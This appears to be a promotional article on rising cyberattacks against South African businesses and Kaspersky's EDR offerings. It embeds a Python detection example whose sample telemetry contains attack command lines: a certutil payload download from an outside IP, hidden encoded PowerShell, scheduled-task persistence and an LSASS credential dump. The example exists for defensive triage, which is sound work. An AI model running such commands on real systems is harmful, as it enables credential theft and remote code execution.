South African businesses face numerous challenges, not least long-prevailing stagnant economic growth and its impact on business operations, all of which has been exacerbated by COVID-19. Adding to these pressures, the spate of cyberattacks and exploits against local enterprises that have made headlines in recent months demonstrates that no entity, regardless of size, location or type of business, is untouchable.
For the first half of this year (H1-20), as much of the world went into lockdown and more people connected remotely, research by Kaspersky, a leader in cybersecurity solutions, has consistently reported increasing cybercriminal activity, with rising numbers of malware, phishing and advanced persistent threat (APT) driven attacks. Kaspersky has also identified a growing global trend of hacking-for-hire groups breaking into enterprises, including small and medium-sized businesses.
Such a threat actor generally does not engage in the activities commonly associated with the cybercrime underworld, meaning that in many cases these groups are not part of the cybersecurity risk model of most businesses. This is cause for concern, as their interest is in gathering sensitive business information, and the threat actor is known to be highly adaptive, using an iterative, fast-paced approach to software design that allows it to execute effective campaigns.
Preparedness, in the face of digital threats that are rapidly growing in number and sophistication, is therefore the name of the game for businesses that want to protect themselves, survive and thrive in the digital age.
Assessing the risks
Kaspersky senior security researcher Maher Yamout says that many new users have connected to the Internet in South Africa, particularly since the COVID-19 pandemic struck, and cybercriminals have been quick to follow the increased Internet activity.
“What makes the market even more attractive for hackers is that South Africa has many small- to medium-sized enterprises that are now online due to the restrictions – or opportunities – as a result of COVID-19. Typically, these enterprises have neither mature IT security systems and skills nor the capital to build them, making them more vulnerable to cyberattacks,” states Yamout.
He warns that cybercriminal activity will only continue to grow in sophistication and that businesses across every sector will remain targets of such digital threats. “Businesses of all makes and sizes must therefore look to invest in adequate IT security solutions, to safeguard their corporate network and prevent business disruption and damage by eliminating the risks posed by complex and targeted threats.”
According to Yana Shevchenko, Kaspersky senior product marketing manager, the leading drivers for cybersecurity spend are to reduce incidents and breaches, meet regulatory requirements around cybersecurity and build a clear process of investigation and response to cybersecurity incidents.
Shevchenko points out that counteracting today’s advanced threats and complex attacks requires an established incident response process: collecting and analysing data, discovering threats, checking what is relevant, investigating the causes and neutralising the problem to limit damage. The process also involves recovery to ensure business continuity, and all of this has to be done in the face of a global shortage of IT security personnel and expertise.
Starting at the Endpoint
Corporate endpoints, where data, users and corporate systems all come together to generate and implement business processes, are particularly vulnerable.
Implementing the full endpoint protection cycle – from automatic threat-blocking to responding swiftly and appropriately to complex incidents – requires preventive technologies supplemented by advanced defence capabilities.
In this regard, Kaspersky Endpoint Detection and Response (EDR), in addition to Endpoint Protection Platform (EPP) capabilities, provides comprehensive visibility across all endpoints on the corporate network, as well as stronger defences, allowing for quicker response times and the ability to automate routine tasks in order to discover, prioritise, investigate and neutralise complex threats and targeted attacks.
However, Shevchenko points out that it’s important to remember that an EDR is not self-operated. “Well-trained security experts are needed to maximise EDR investment and take advantage of its full power.”
Shortcut to skills
Shevchenko notes that as corporate processes undergo extensive, across-the-board automation, businesses are becoming increasingly dependent on information technologies.
However, the more dependent on IT an enterprise becomes, the more attractive hacking its information systems becomes.
“Businesses often struggle to find the expertise and staff needed to track down today’s modern threats and respond appropriately, and existing IT teams can become overwhelmed by managing systems and tools, leaving little time for thorough security incident investigation and analysis,” she explains.
Shevchenko states that Kaspersky EDR is quick and easy to implement, reduces the time needed for initial evidence collection and provides in-depth telemetry analysis. By maximising the automation of the incident response process, Kaspersky EDR reduces overall response times from days or hours to minutes.
For more IT-security-matured enterprises, Kaspersky provides IT security experts with powerful Kaspersky EDR for advanced threat discovery, deep investigative capabilities powered by MITRE ATT&CK framework mapping and Kaspersky Threat Intelligence, threat hunting and a centralised response to multi-stage complex attacks.
MITRE, in Round 2 (APT29) of its ATT&CK Evaluations, confirmed Kaspersky EDR’s high level of performance in detecting key techniques applied at crucial stages of modern targeted cyberattacks. Additionally, Kaspersky continues to enrich its EDR detections with data from the MITRE ATT&CK knowledge base, a globally curated catalogue of adversary tactics, techniques and behaviours observed in real attacks.
Shevchenko notes that the MITRE ATT&CK knowledge base provides additional context to handle advanced threats more efficiently.
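To make the ATT&CK mapping described above concrete, here is a small added example (written for this article, not Kaspersky EDR’s own logic): a handful of detection rules tag endpoint process-creation telemetry with ATT&CK technique IDs, and hosts are then prioritised by how many distinct tactics the observed behaviour spans, which is how a multi-stage attack stands out from an isolated hit. The technique IDs are real ATT&CK identifiers; the rule regexes, host names and telemetry lines are constructed for illustration and would need tuning (allow-lists, parent-process context) before production use.

```python
"""Map endpoint telemetry to MITRE ATT&CK techniques and rank hosts by tactic coverage.

Added example for this article; illustrative rules, not a vendor's detection content.
The telemetry below is constructed, not captured from a real host.
"""
import re
from collections import defaultdict

# (rule name, ATT&CK technique ID, tactic, regex applied to the command line)
RULES = [
    ("powershell_encoded", "T1059.001", "execution",
     re.compile(r"powershell(\.exe)?\b.*(-enc|-encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("schtasks_create", "T1053.005", "persistence",
     re.compile(r"schtasks(\.exe)?\b.*/create", re.I)),
    ("lsass_dump", "T1003.001", "credential-access",
     re.compile(r"comsvcs\.dll,?\s*MiniDump|procdump.*lsass", re.I)),
    ("run_key_persistence", "T1547.001", "persistence",
     re.compile(r"reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("ingress_tool_transfer", "T1105", "command-and-control",
     re.compile(r"(certutil.*-urlcache|bitsadmin.*/transfer|curl|wget)\b.*https?://", re.I)),
]

# Constructed process-creation telemetry: host<TAB>user<TAB>command line.
# HR-LAPTOP-07 shows a multi-stage intrusion; FIN-DESKTOP-02 shows ordinary admin
# activity plus one benign Run-key entry (a deliberate false positive to tune out).
TELEMETRY = """\
HR-LAPTOP-07\tj.dlamini\tcertutil.exe -urlcache -split -f http://198.51.100.23/update.exe C:\\Users\\Public\\update.exe
HR-LAPTOP-07\tj.dlamini\tpowershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
HR-LAPTOP-07\tj.dlamini\tschtasks.exe /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\update.exe
HR-LAPTOP-07\tSYSTEM\trundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 612 C:\\Windows\\Temp\\lsass.dmp full
FIN-DESKTOP-02\tt.naidoo\tpowershell.exe -File C:\\Scripts\\backup.ps1
FIN-DESKTOP-02\tt.naidoo\treg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDrive /t REG_SZ /d C:\\Users\\t.naidoo\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe
"""


def parse_event(line):
    """Split one tab-separated telemetry line into a dict."""
    host, user, cmdline = line.rstrip("\n").split("\t", 2)
    return {"host": host, "user": user, "cmdline": cmdline}


def map_to_attack(event):
    """Return every (rule, technique, tactic) whose regex matches the command line."""
    return [(name, tid, tactic) for name, tid, tactic, rx in RULES
            if rx.search(event["cmdline"])]


def triage(telemetry):
    """Aggregate hits per host. Score = number of distinct ATT&CK tactics seen."""
    per_host = defaultdict(lambda: {"techniques": set(), "tactics": set(), "events": 0})
    for line in telemetry.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        bucket = per_host[ev["host"]]
        bucket["events"] += 1
        for _name, tid, tactic in map_to_attack(ev):
            bucket["techniques"].add(tid)
            bucket["tactics"].add(tactic)
    return {
        host: {"events": d["events"],
               "techniques": sorted(d["techniques"]),
               "tactics": sorted(d["tactics"]),
               "score": len(d["tactics"])}
        for host, d in per_host.items()
    }


def prioritise(result):
    """Hosts ordered for analyst attention: most tactics first, then by name."""
    return sorted(result, key=lambda h: (-result[h]["score"], h))


if __name__ == "__main__":
    summary = triage(TELEMETRY)
    for host in prioritise(summary):
        d = summary[host]
        print(f"{host}: score={d['score']} tactics={d['tactics']} techniques={d['techniques']}")
```

Run as a script, the host that chained ingress tool transfer, encoded PowerShell, scheduled-task persistence and an LSASS dump is ranked first with a score of 4; the finance workstation scores 1 on a single persistence-tactic hit, which is exactly the context an analyst needs to decide what to investigate first.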
For smaller enterprises, Kaspersky EDR Optimum provides basic EDR capabilities, catering to businesses with limited resources and cybersecurity expertise. Kaspersky EDR Optimum can be further reinforced with the automated Kaspersky Sandbox, helping companies counteract new threats capable of bypassing endpoint protection.
To further accommodate businesses with limited cash resources, Kaspersky’s Managed Detection and Response helps businesses conduct threat hunting and deliver a swift reaction to cyberthreats and incidents.
For large enterprises, Kaspersky offers extended EDR capabilities, as well as an anti-targeted attack platform, which builds reliable defences that protect corporate infrastructure from the most sophisticated threats and APT-like attacks while helping to support regulatory compliance.
“Kaspersky Anti Targeted Attack Platform combines network-level advanced threat discovery and EDR capabilities and acts as an Extended Detection and Response solution delivering all-in-one APT protection powered by our Threat Intelligence and MITRE ATT&CK framework,” Shevchenko summarises.
Kaspersky has an overall rating of 4.9 out of 5 in the EDR market, according to Gartner Peer Insights, based on 159 ratings as of May 2020.